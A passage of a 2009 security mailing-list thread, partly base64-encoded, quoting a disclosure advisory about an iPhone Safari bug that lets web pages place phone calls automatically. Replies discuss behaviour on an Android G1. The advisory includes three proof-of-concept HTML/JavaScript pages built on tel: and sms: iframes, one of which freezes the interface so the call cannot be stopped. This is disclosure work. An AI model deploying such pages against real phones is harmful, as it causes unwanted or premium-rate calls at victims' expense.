MDA4OiBWZW5kZXIgc2F5cyB2dWxuZXJhYmlsaXR5IGlzIGZpeGVkIGluIHVwY29taW5nIE9TDQo+
ICAgICAgICAgICAgICAgICAgdmVyc2lvbi4NCj4gICBOb3YuIDIwLiAyMDA4OiBQdWJsaWMgZGlz
Y2xvc3VyZS4NCj4gICBKdW4uIDE4LiAyMDA5OiBGdWxsLURpc2Nsb3N1cmUuDQo+DQo+LS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5GaXg6DQo+DQo+ICAgaVBob25lIE9TIDIuMg0K
PiAgIGlQaG9uZSBPUyAyLjIuMQ0KPiAgIGlQaG9uZSBPUyAzLjANCj4JDQo+LS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5UZWNobmljYWwgRGV0YWlsczoNCj4NCj4gICBUaGUgU2Fm
YXJpIHZlcnNpb24gcnVubmluZyBvbiB0aGUgaVBob25lIHN1cHBvcnRzIGhhbmRsaW5nIHRoZSBU
RUwgWzFdDQo+ICAgcHJvdG9jb2wgdGhyb3VnaCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFs
ZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4gICBkb25lIGJ5IHBhc3NpbmcgdGhlIHByb3ZpZGVk
IHBob25lIG51bWJlciB0byB0aGUgdGVsZXBob255DQo+ICAgYXBwbGljYXRpb24uIFVuZGVyIG5v
cm1hbCBjb25kaXRpb25zLCBsb2FkaW5nIGEgdGVsOiBVUkkgcmVzdWx0cyBpbiBhDQo+ICAgbWVz
c2FnZSBib3ggYXNraW5nIHRoZSB1c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBu
dW1iZXIuIFRoZQ0KPiAgIHVzZXIgaXMgcHJlc2VudGVkIHdpdGggdGhlIHNpbXBsZSBjaG9pY2Ug
dG8gZWl0aGVyIHByZXNzIGNhbGwgb3INCj4gICBjYW5jZWwuDQo+DQo+ICAgQSBURUwgVVJJIGNh
biBiZSBvcGVuZWQgYXV0b21hdGljYWxseSBpZiB0aGUgVEVMIFVSSSBpcyB1c2VkIGFzIHRoZQ0K
PiAgIHNvdXJjZSBvZiBhbiBIVE1MIGlmcmFtZSBvciBmcmFtZSwgYXMgdGhlIFVSTCBvZiBhIG1l
dGEgcmVmcmVzaCwgYXMNCj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwg
YW5kIGFzIHRoZSBsb2NhdGlvbiBvZiB0aGUNCj4gICBjdXJyZW50IG9yIGEgbmV3IHdpbmRvdyB1
c2luZyBqYXZhc2NyaXB0Lg0KPg0KPiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJh
YmlsaXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPiAgIHBlcm1pc3Npb24gdG8gY2Fs
bCIgZGlhbG9nIGluIGEgd2F5IHRoYXQgY2hvb3NlcyB0aGUgImNhbGwiIG9wdGlvbg0KPiAgIHJh
dGhlciB0aGFuIHRoZSAiY2FuY2VsIiBvcHRpb24uDQo+CQ0KPiAgIFRoaXMgY29uZGl0aW9uIG9j
Y3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4gICBTYWZh
cmkgaXMgY2xvc2VkIGJ5IGxhdW5jaGluZyBhbiBleHRlcm5hbCBhcHBsaWNhdGlvbiwgZm9yIGV4
YW1wbGUNCj4gICBsYXVuY2hpbmcgdGhlIFNNUyBhcHBsaWNhdGlvbiAoaW4gb3JkZXIgdG8gaGFu
ZGxlIGEgU01TIFVSSSBbMl0pLiBUaGUNCj4gICBTTVMgYXBwbGljYXRpb24gY2FuIGJlIGxhdW5j
aGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+ICAgc291cmNlIG9mIGFuIGlm
cmFtZS4gVGhpcyBpcyBzaG93biBpbiB0aGUgZmlyc3QgcHJvb2Ytb2YtY29uY2VwdA0KPiAgIGV4
cGxvaXQgYmVsb3cuDQo+CQ0KPiAgIEZ1cnRoZXIgaW52ZXN0aWdhdGlvbiBzaG93ZWQgdGhhdCB0
aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+ICAgbGF1bmNoaW5nIG90aGVyIGFw
cGxpY2F0aW9ucyBzdWNoIGFzOiBNYXBzLCBZb3VUdWJlLCBhbmQgaVR1bmVzLg0KPiAgIExhdW5j
aGluZyB0aGVzZSBhcHBsaWNhdGlvbnMgY2FuIGJlIGFjaGlldmVkIHRocm91Z2ggbG9hZGluZyBz
cGVjaWFsDQo+ICAgVVJMcyB1c2luZyB0aGUgbWV0YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93
biBpbiB0aGUgc2Vjb25kDQo+ICAgcHJvb2Ytb2YtY29uY2VwdCBleHBsb2l0IGJlbG93Lg0KPg0K
PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVk
IHRocm91Z2ggcG9wdXANCj4gICB3aW5kb3dzIChlLmcuIGphdmFzY3JpcHQgYWxlcnQpLiBJbiB0
aGlzIHNpdHVhdGlvbiB0aGUgaW5pdGlhdGluZyBhcHANCj4gICBkb2VzIG5vdCBuZWVkIHRvIGJl
IHRlcm1pYW50ZWQgaW4gb3JkZXIgdG8gYWN0aXZlIHRoZSBjYWxsLg0KPgkNCj4gICBGaW5hbGx5
LCB3ZSBkaXNjb3ZlcmVkIGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0N
Cj4gICBtYWxpY2lvdXMgcGhvbmUgY2FsbHMgdGhhdCBjYW5ub3QgYmUgcHJldmVudGVkIG9yIGNh
bmNlbGVkIGJ5IHRoZQ0KPiAgIHZpY3RpbS4gVGhpcyBidWcgYWxsb3dzIHRoZSBhdHRhY2tlciB0
byBmcmVleiB0aGUgR1VJIChncmFwaGljYWwgdXNlcg0KPiAgIGludGVyZmFjZSkgZm9yIGEgbnVt
YmVyIG9mIHNlY29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+ICAgcHJv
Z3Jlc3NlcyBpbgl0aGUgYmFja2dyb3VuZCBhbmQgY2Fubm90IGJlIHN0b3BwZWQgYnkgdGhlIHZp
Y3RpbSB1c2VyLg0KPiAgIEZyZWV6aW5nIHRoZSBHVUkgaXMgYWNoaWV2ZWQgYnkgcGFzc2luZyBh
ICJ2ZXJ5IGxvbmciIHBob25lIG51bWJlciB0bw0KPiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRo
ZSBTTVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+ICAgc3RhcnRlZCwg
ZnJlZXplcyB0aGUgaVBob25lIEdVSS4gQWxzbyBzd2l0Y2hpbmcgb2ZmIHRoZSBpUGhvbmUgY2Fu
bm90DQo+ICAgYmUgcGVyZm9ybWVkIGZhc3QgZW5vdWdoIGluIG9yZGVyIHRvIHByZXZlbnQgdGhl
IG1hbGljaW91cyBjYWxsLg0KPgkNCj4NCj4gICBbMV0gaHR0cDovL3d3dy5yZmMtZWRpdG9yLm9y
Zy9yZmMvcmZjMzk2Ni50eHQNCj4gICBbMl0gaHR0cDovL3Rvb2xzLmlldGYub3JnL2h0bWwvZHJh
ZnQtYW50dGktZ3NtLXNtcy11cmwtMDQNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0KPg0KPkZ1cnRoZXIgRGlzY3Vzc2lvbjoNCj4NCj4gICBUaGUgZGlhbGluZyBkaWFsb2cgaXMg
Y2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRoZSB1c2VyLCBpbiBtb3N0DQo+ICAgY2Fz
ZXMsIGNhbid0IHByZXNzIGNhbmNlbCBxdWljayBlbm91Z2ggaW4gb3JkZXIgdG8gc3RvcCB0aGUg
aW5pdGlhdGlvbg0KPiAgIG9mIHRoZSBjYWxsLiBPbmNlIHRoZSBleHRlcm5hbCBhcHBsaWNhdGlv
biBpcyBsYXVuY2hlZCwgdGhlIHRlbGVwaG9ueQ0KPiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcg
aW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWluZyB0aGUgY2FsbC4gT25seQ0KPiAgIHRoZSBjYWxs
IGZvcndhcmRpbmcgZGlhbG9nIChjb250YWluaW5nIHRoZSAiZGlzbWlzcyIgYnV0dG9uKSBpbmRp
Y2F0ZXMNCj4gICBhIGNhbGwgYmVpbmcgbWFkZS4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KPg0KPlByb29mLW9mLUNvbmNlcHQgd2l0aCBwbGFpbiBIVE1MIHVzaW5nIHRoZSBT
TVMgYXBwbGljYXRpb246DQo+DQo+ICAgPGh0bWw+DQo+ICAgPGhlYWQ+DQo+ICAgPHRpdGxlPmlQ
aG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGlu
ZXINCj4gICA8L3RpdGxlPg0KPiAgIDwvaGVhZD4NCj4gICA8Ym9keT4NCj4gICA8aWZyYW1lIHNy
Yz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPiAgIDxp
ZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9MTA+PC9pZnJhbWU+
DQo+ICAgPCEtLSBzZWNvbmQgaWZyYW1lIGlzIHRvIGF0dGFjayBxdWljayB1c2VycyB3aG8gbWFu
YWdlIHRvIGNsb3NlIHRoZQ0KPiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8tLT4NCj4gICA8
aWZyYW1lIHNyYz0idGVsOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1l
Pg0KPiAgIDwvYm9keT4NCj4gICA8L2h0bWw+DQo+DQo+UHJvb2Ytb2YtQ29uY2VwdCB1c2luZyBq
YXZhc2NyaXB0IGFuZCB0aGUgTWFwcyBhcHBsaWNhdGlvbjoNCj4NCj4gICA8aHRtbD4NCj4gICA8
aGVhZD4NCj4gICA8dGl0bGU+aVBob25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgRXhwbG9pdCBE
ZW1vIGJ5IENvbGxpbiBNdWxsaW5lcg0KPiAgIDwvdGl0bGU+DQo+ICAgPG1ldGEgaHR0cC1lcXVp
dj0icmVmcmVzaCIgY29udGVudD0iMDsNCj4gICBVUkw9aHR0cDovL21hcHMuZ29vZ2xlLmRlL21h
cHM/cT1yaGVpbnN0cmFzc2UrNzUrZGFybXN0YWR0Ij4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+
DQo+ICAgPHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgZnVuY3Rpb24gYSgpIHsNCj4gICAg
ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIFdJRFRIPTUw
IA0KPkhFSUdIVD0xMD48L2lmcmFtZT4iKTsNCj4gICB9DQo+ICAgc2V0VGltZW91dCgiYSgpIiwg
MTAwKTsNCj4gICA8L3NjcmlwdD4NCj4gICA8L2JvZHk+DQo+ICAgPC9odG1sPg0KPgkNCj5Qcm9v
Zi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0b3AgdGhl
IG1hbGljaW91cyANCj5waG9uZSBjYWxsOg0KPg0KPiAgIDxodG1sPg0KPiAgIDxoZWFkPg0KPiAg
IDx0aXRsZT5pUGhvbmUgU2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29s
bGluIE11bGxpbmVyDQo+ICAgPC90aXRsZT4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+DQo+ICAg
PHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgbCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0K
PiAgIGZvciAoaSA9IDA7IGkgPCAxMDAwMDsgaSsrKSB7DQo+ICAgICAgICAgICBsID0gbCArICIz
MzQwOTQ4MDM0Mjk4MjMyIjsNCj4gICB9DQo+ICAgbCA9IGwgKyAiXCIgd2lkdGg9MTAgaGVpZ2h0
PTEwPjwvaWZyYW1lPjxpZnJhbWUNCj4gICBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgaGVpZ2h0
PTEwIHdpZHRoPTEwPjwvaWZyYW1lPiI7DQo+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+ICAgPC9z
Y3JpcHQ+DQo+ICAgPC9ib2R5Pg0KPiAgIDwvaHRtbD4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KPg0KPk1vcmUgRGV0YWlsZWQgSW5mb3JtYXRpb246DQo+DQo+ICBEZW1vIHZp
ZGVvIGF2YWlsYWJsZSBhdDoNCj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9pcGhvbmUvDQo+
DQo+ICBBZHZpc29yaWVzOg0KPiAgIGh0dHA6Ly93d3cubXVsbGluZXIub3JnL3NlY3VyaXR5L2Fk
dmlzb3JpZXMvDQo+DQo+LS0tIEVORCBBRFZJU09SWSAtLS0NCj4NCj4NCj4tLSANCj5Db2xsaW4g
Ui4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+DQo+aW5mby9wZ3A6IGZpbmdlciBj
b2xsaW5AYmV0YXZlcnNpb24ubmV0DQo+SWYgQmlsbCBHYXRlcyBoYWQgYSBuaWNrZWwgZm9yIGV2
ZXJ5IHRpbWUgV2luZG93cyBjcmFzaGVkLi4uIE9oIHdhaXQsIGhlIA0KPmRvZXMhDQo=

------OOQR8OIVASFMLRMIKQ9G04MAIHM98G--



From: Collin Mulliner collin@betaversion.net
Sent: Thu 18. Jun 2009 19:29
Mike,

just getting to the phone dialer is not a bug! That is what the tel: 
protocol is for. All most all mobile phones implement this, every time 
you open a tel: URL you will get to the dialer in some way.

Collin

Mike Ely wrote:
> Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
> 
> FWIW, it didnt actually dial, just loaded the dialer with that number ready.  
> 
> Looks like this is a Webkit bug, not Safari. 
> 
> Collin Mulliner <collin@betaversion.net> wrote:
> 
>> Released since Apple published the iPhone 3.0 security fixes.
>>
>> Vulnerability Report
>>
>> --- BEGIN ADVISORY ---
>>
>> Manufacturer: Apple (www.apple.com)
>> Device:       iPhone 3G (iPhone 1st Gen)
>> Firmware:     2.1 (possible earlier versions)
>> Device Type:  smart phone
>>
>> Subsystems: Safari (and mobile telephony)
>>
>> -----------------------------
>>
>> Short name:
>>   iPhone Safari phone-auto-dial (vulnerability)
>>
>> Vulnerability class:
>>   application logic bug
>>
>> Executive Summary:
>>   A malicious website can initiate a phone call without the need of user
>>   interaction. The destination phone number is chosen by the attacker.
>>
>> Risk: MEDIUM-HIGH
>>   Medium to high risk due to the possibility of financial gain through
>>   this attack by calling of premium rate numbers (e.g. 1-900 in the
>>   U.S.). Denial-of-service against arbitrary phone numbers through
>>   mass-calling. User cannot prevent attack.
>>
>> -----------------------------
>>
>> Reporter: Collin Mulliner <collin[AT]mulliner.org>
>>
>> -----------------------------
>>
>> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>>
>> -----------------------------
>>
>> Time line:
>>
>>   Oct. 20. 2008: Reported vulnerability to vendor.
>>   Oct. 20. 2008: Vendor acknowledges receiving our email.
>>                  Not commenting on the vulnerability itself.
>>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>>   Oct. 30. 2008: Sent additional information.
>>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>>                  version.
>>   Nov. 20. 2008: Public disclosure.
>>   Jun. 18. 2009: Full-Disclosure.
>>
>> -----------------------------
>>
>> Fix:
>>
>>   iPhone OS 2.2
>>   iPhone OS 2.2.1
>>   iPhone OS 3.0
>> 	
>> -----------------------------
>>
>> Technical Details:
>>
>>   The Safari version running on the iPhone supports handling the TEL [1]
>>   protocol through launching the telephony/dialer application. This is
>>   done by passing the provided phone number to the telephony
>>   application. Under normal conditions, loading a tel: URI results in a
>>   message box asking the users permission to call the given number. The
>>   user is presented with the simple choice to either press call or
>>   cancel.
>>
>>   A TEL URI can be opened automatically if the TEL URI is used as the
>>   source of an HTML iframe or frame, as the URL of a meta refresh, as
>>   the location of a HTTP 30X redirect, and as the location of the
>>   current or a new window using javascript.
>>
>>   We discovered a security vulnerability that dismisses the "ask for
>>   permission to call" dialog in a way that chooses the "call" option
>>   rather than the "cancel" option.
>> 	
>>   This condition occurs if a TEL URI is activated at the same time
>>   Safari is closed by launching an external application, for example
>>   launching the SMS application (in order to handle a SMS URI [2]). The
>>   SMS application can be launched through placing a SMS URI as the
>>   source of an iframe. This is shown in the first proof-of-concept
>>   exploit below.
>> 	
>>   Further investigation showed that this behavior can be reproduced by
>>   launching other applications such as: Maps, YouTube, and iTunes.
>>   Launching these applications can be achieved through loading special
>>   URLs using the meta refresh tag. This is shown in the second
>>   proof-of-concept exploit below.
>>
>>   We also discovered that the bug can also be triggered through popup
>>   windows (e.g. javascript alert). In this situation the initiating app
>>   does not need to be termianted in order to active the call.
>> 	
>>   Finally, we discovered a second bug that can be used to perform
>>   malicious phone calls that cannot be prevented or canceled by the
>>   victim. This bug allows the attacker to freez the GUI (graphical user
>>   interface) for a number of seconds. While the GUI is frozen the call
>>   progresses in	the background and cannot be stopped by the victim user.
>>   Freezing the GUI is achieved by passing a "very long" phone number to
>>   the SMS application. The SMS application, immediately after being
>>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
>>   be performed fast enough in order to prevent the malicious call.
>> 	
>>
>>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>>
>> -----------------------------
>>
>> Further Discussion:
>>
>>   The dialing dialog is clearly shown to the user also the user, in most
>>   cases, cant press cancel quick enough in order to stop the initiation
>>   of the call. Once the external application is launched, the telephony
>>   application is running in the background performing the call. Only
>>   the call forwarding dialog (containing the "dismiss" button) indicates
>>   a call being made.
>>
>> -----------------------------
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <!-- second iframe is to attack quick users who manage to close the
>>        first call-dialog //-->
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   </body>
>>   </html>
>>
>> Proof-of-Concept using javascript and the Maps application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   <meta http-equiv="refresh" content="0;
>>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   function a() {
>>    document.write("<iframe src="tel:+14089748388" WIDTH=50 
>> HEIGHT=10></iframe>");
>>   }
>>   setTimeout("a()", 100);
>>   </script>
>>   </body>
>>   </html>
>> 	
>> Proof-of-Concept attack where the victim user cannot stop the malicious 
>> phone call:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   l = "<iframe src="sms:";
>>   for (i = 0; i < 10000; i++) {
>>           l = l + "3340948034298232";
>>   }
>>   l = l + "" width=10 height=10></iframe><iframe
>>   src="tel:+14089748388" height=10 width=10></iframe>";
>>   document.write(l);
>>   </script>
>>   </body>
>>   </html>
>>
>> -----------------------------
>>
>> More Detailed Information:
>>
>>  Demo video available at:
>>   http://www.mulliner.org/iphone/
>>
>>  Advisories:
>>   http://www.mulliner.org/security/advisories/
>>
>> --- END ADVISORY ---
>>
>>
>> -- 
>> Collin R. Mulliner <collin@betaversion.net>
>> info/pgp: finger collin@betaversion.net
>> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
>> does!


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
C gives you enough rope to hang yourself. C++ also gives you the tree 
object to tie it to.


From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 14:07
------OOQ6QVNMQ89GSPKM03TM81BMDDCI85
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

UGVyaGFwcyBub3QgZ2V0dGluZyB0byB0aGUgZGlhbGVyLCBidXQgaGF2aW5nIHRoZSBkaWFsZXIg
bGF1bmNoIGF1dG9tYXRpY2FsbHkganVzdCBmcm9tIHZpZXdpbmcgYW4gZW1haWw/CgpDb2xsaW4g
TXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOgoKPk1pa2UsDQo+DQo+anVz
dCBnZXR0aW5nIHRvIHRoZSBwaG9uZSBkaWFsZXIgaXMgbm90IGEgYnVnISBUaGF0IGlzIHdoYXQg
dGhlIHRlbDogDQo+cHJvdG9jb2wgaXMgZm9yLiBBbGwgbW9zdCBhbGwgbW9iaWxlIHBob25lcyBp
bXBsZW1lbnQgdGhpcywgZXZlcnkgdGltZSANCj55b3Ugb3BlbiBhIHRlbDogVVJMIHlvdSB3aWxs
IGdldCB0byB0aGUgZGlhbGVyIGluIHNvbWUgd2F5Lg0KPg0KPkNvbGxpbg0KPg0KPk1pa2UgRWx5
IHdyb3RlOg0KPj4gQ29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmlu
ZyBPUyB2ZXJzaW9uIDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24g
ZW1haWwgdG8gZGlhbCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQg
dGhlIHN1YmplY3QgbGluZSA7KQ0KPj4gDQo+PiBGV0lXLCBpdCBkaWRuJ3QgYWN0dWFsbHkgZGlh
bCwganVzdCBsb2FkZWQgdGhlIGRpYWxlciB3aXRoIHRoYXQgbnVtYmVyIHJlYWR5LiAgDQo+PiAN
Cj4+IExvb2tzIGxpa2UgdGhpcyBpcyBhIFdlYmtpdCBidWcsIG5vdCBTYWZhcmkuIA0KPj4gDQo+
PiBDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOg0KPj4gDQo+
Pj4gUmVsZWFzZWQgc2luY2UgQXBwbGUgcHVibGlzaGVkIHRoZSBpUGhvbmUgMy4wIHNlY3VyaXR5
IGZpeGVzLg0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBSZXBvcnQNCj4+Pg0KPj4+IC0tLSBCRUdJ
TiBBRFZJU09SWSAtLS0NCj4+Pg0KPj4+IE1hbnVmYWN0dXJlcjogQXBwbGUgKHd3dy5hcHBsZS5j
b20pDQo+Pj4gRGV2aWNlOiAgICAgICBpUGhvbmUgM0cgKGlQaG9uZSAxc3QgR2VuKQ0KPj4+IEZp
cm13YXJlOiAgICAgMi4xIChwb3NzaWJsZSBlYXJsaWVyIHZlcnNpb25zKQ0KPj4+IERldmljZSBU
eXBlOiAgc21hcnQgcGhvbmUNCj4+Pg0KPj4+IFN1YnN5c3RlbXM6IFNhZmFyaSAoYW5kIG1vYmls
ZSB0ZWxlcGhvbnkpDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+
DQo+Pj4gU2hvcnQgbmFtZToNCj4+PiAgIGlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsICh2
dWxuZXJhYmlsaXR5KQ0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBjbGFzczoNCj4+PiAgIGFwcGxp
Y2F0aW9uIGxvZ2ljIGJ1Zw0KPj4+DQo+Pj4gRXhlY3V0aXZlIFN1bW1hcnk6DQo+Pj4gICBBIG1h
bGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwgd2l0aG91dCB0aGUgbmVl
ZCBvZiB1c2VyDQo+Pj4gICBpbnRlcmFjdGlvbi4gVGhlIGRlc3RpbmF0aW9uIHBob25lIG51bWJl
ciBpcyBjaG9zZW4gYnkgdGhlIGF0dGFja2VyLg0KPj4+DQo+Pj4gUmlzazogTUVESVVNLUhJR0gN
Cj4+PiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBvZiBmaW5h
bmNpYWwgZ2FpbiB0aHJvdWdoDQo+Pj4gICB0aGlzIGF0dGFjayBieSBjYWxsaW5nIG9mIHByZW1p
dW0gcmF0ZSBudW1iZXJzIChlLmcuIDEtOTAwIGluIHRoZQ0KPj4+ICAgVS5TLikuIERlbmlhbC1v
Zi1zZXJ2aWNlIGFnYWluc3QgYXJiaXRyYXJ5IHBob25lIG51bWJlcnMgdGhyb3VnaA0KPj4+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4+Pg0KPj4+IC0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBSZXBvcnRlcjogQ29sbGluIE11bGxp
bmVyIDxjb2xsaW5bQVRdbXVsbGluZXIub3JnPg0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEFmZmlsaWF0aW9uOiBNVWxsaU5FUi5PUkcgLyB0aGUgdHJp
ZmluaXRlIGdyb3VwIC8gKEZyYXVuaG9mZXIgU0lUKQ0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IFRpbWUgbGluZToNCj4+Pg0KPj4+ICAgT2N0LiAyMC4g
MjAwODogUmVwb3J0ZWQgdnVsbmVyYWJpbGl0eSB0byB2ZW5kb3IuDQo+Pj4gICBPY3QuIDIwLiAy
MDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBvdXIgZW1haWwuDQo+Pj4gICAgICAg
ICAgICAgICAgICBOb3QgY29tbWVudGluZyBvbiB0aGUgdnVsbmVyYWJpbGl0eSBpdHNlbGYuDQo+
Pj4gICBPY3QuIDI3LiAyMDA4OiBTZW50IHVwZGF0ZSB0byB2ZW5kb3IsIGFsc28gcmVxdWVzdGlu
ZyBhIHN0YXR1cyByZXBvcnQuDQo+Pj4gICBPY3QuIDI5LiAyMDA4OiBSZXBseSBmcm9tIHZlbmRv
ciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPj4+ICAgT2N0LiAzMC4gMjAwODog
U2VudCBhZGRpdGlvbmFsIGluZm9ybWF0aW9uLg0KPj4+ICAgTm92LiAxMy4gMjAwODogVmVuZGVy
IHNheXMgdnVsbmVyYWJpbGl0eSBpcyBmaXhlZCBpbiB1cGNvbWluZyBPUw0KPj4+ICAgICAgICAg
ICAgICAgICAgdmVyc2lvbi4NCj4+PiAgIE5vdi4gMjAuIDIwMDg6IFB1YmxpYyBkaXNjbG9zdXJl
Lg0KPj4+ICAgSnVuLiAxOC4gMjAwOTogRnVsbC1EaXNjbG9zdXJlLg0KPj4+DQo+Pj4gLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEZpeDoNCj4+Pg0KPj4+ICAgaVBob25l
IE9TIDIuMg0KPj4+ICAgaVBob25lIE9TIDIuMi4xDQo+Pj4gICBpUGhvbmUgT1MgMy4wDQo+Pj4g
CQ0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBUZWNobmljYWwg
RGV0YWlsczoNCj4+Pg0KPj4+ICAgVGhlIFNhZmFyaSB2ZXJzaW9uIHJ1bm5pbmcgb24gdGhlIGlQ
aG9uZSBzdXBwb3J0cyBoYW5kbGluZyB0aGUgVEVMIFsxXQ0KPj4+ICAgcHJvdG9jb2wgdGhyb3Vn
aCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFsZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4+
PiAgIGRvbmUgYnkgcGFzc2luZyB0aGUgcHJvdmlkZWQgcGhvbmUgbnVtYmVyIHRvIHRoZSB0ZWxl
cGhvbnkNCj4+PiAgIGFwcGxpY2F0aW9uLiBVbmRlciBub3JtYWwgY29uZGl0aW9ucywgbG9hZGlu
ZyBhIHRlbDogVVJJIHJlc3VsdHMgaW4gYQ0KPj4+ICAgbWVzc2FnZSBib3ggYXNraW5nIHRoZSB1
